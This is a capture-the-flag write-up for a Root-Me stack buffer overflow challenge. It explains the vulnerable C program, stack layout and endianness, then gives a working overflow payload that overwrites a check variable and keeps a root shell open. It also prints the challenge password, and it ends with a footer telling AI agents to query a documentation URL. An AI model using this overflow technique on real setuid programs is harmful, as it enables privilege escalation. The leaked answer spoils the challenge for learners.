# ELF x86 - Stack buffer overflow basic 1 ## Source code ```c #include #include #include #include int main() { int var; int check = 0x04030201; char buf[40]; fgets(buf,45,stdin); printf("\n[buf]: %s\n", buf); printf("[check] %p\n", check); if ((check != 0x04030201) && (check != 0xdeadbeef)) printf ("\nYou are on the right way!\n"); if (check == 0xdeadbeef) { printf("Yeah dude! You win!\nOpening your shell...\n"); setreuid(geteuid(), geteuid()); system("/bin/bash"); printf("Shell closed! Bye.\n"); } return 0; } ``` The program first sets up a `check` variable with the value `0x04030201`. The program then sets up a buffer of 40 bytes. It then uses the `fgets` to take user input. ## fgets() ```c char fgets(char s, int size, FILE stream); ``` As we can see it takes 3 arguments. 1. The first argument is the location where the input is supposed to be read to which is the buffer in our case. 2. The second argument is the maximum number of bytes to be read being 45. 3. The third argument is where the data us read from which is the STDIN in our case. Lastly it has two conditional statements: 1. The first conditional executes if we replace the original value of the `check` variable with anything other than `0xdeadbeef`. 2. The second conditional executes if we replace the original value of the `check` variable with `0xdeadbeef`. Let's provide 40 `a` and 4 `b` characters as input. ``` $ python -c 'print "a"*40 + "b"*4' | ./ch13 [buf]: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa [check] 0x62626262 You are on the right way! ``` We can see that `check` was set to `bbbb` which is `0x62626262` in hexadecimal which caused first conditional statement to be executed. ## Stack ``` +---------------+ | 61 61 61 61 | <====== buffer (40 bytes) | 61 61 61 61 | | 61 61 61 61 | | 61 61 61 61 | | 61 61 61 61 | | 61 61 61 61 | | 61 61 61 61 | | 61 61 61 61 | | 61 61 61 61 | | 61 61 61 61 | +---------------+ | 62 62 62 62 | <====== check +---------------+ ``` We want to set the `check` variable to `0xdeadbeef`. However before we do that we need to understand the concept of endianness. ## Big endianness ``` +--------+--------+--------+--------+ | 0x1337 | 0x1338 | 0x1339 | 0x1340 | +--------+--------+--------+--------+ | de | ad | be | ef | +--------+--------+--------+--------+ ``` The LSB is stored in the high memory address (`0x1340`) while the MSB is stored in the low memory address (`0x1337`). This is the format in which humans write numbers. ## Little endianness ``` +--------+--------+--------+--------+ | 0x1337 | 0x1338 | 0x1339 | 0x1340 | +--------+--------+--------+--------+ | ef | be | ad | de | +--------+--------+--------+--------+ ``` The LSB is stored in the low memory address (`0x1337`) while the MSB is stored in the high memory address (`0x1340`). This is the format in which machines store data. This is the relevant format for our level. ## Exploit Now we are ready to craft our exploit. ``` $ python -c 'print "a"*40 + "\xef\xbe\xad\xde"' | ./ch13 [buf]: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaᆳ� [check] 0xdeadbeef Yeah dude! You win! Opening your shell... Shell closed! Bye. ``` * So the shell is closing immediately. In order to complete the exploit we need the shell to stay open. * We can use the `cat` command to keep the shell open. ``` $ (python -c 'print "a"*40 + "\xef\xbe\xad\xde"' ; cat) | ./ch13 [buf]: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaᆳ� [check] 0xdeadbeef Yeah dude! You win! Opening your shell... ``` We know that the password is in the `HOME/.passwd` file. All we have to do now is to `cat` it. ``` cat .passwd 1w4ntm0r3pr0np1s ``` ## Password ``` 1w4ntm0r3pr0np1s ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://kunalwalavalkar.gitbook.io/write-ups/root-me/app-system/elf-x86-stack-buffer-overflow-basic-1.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.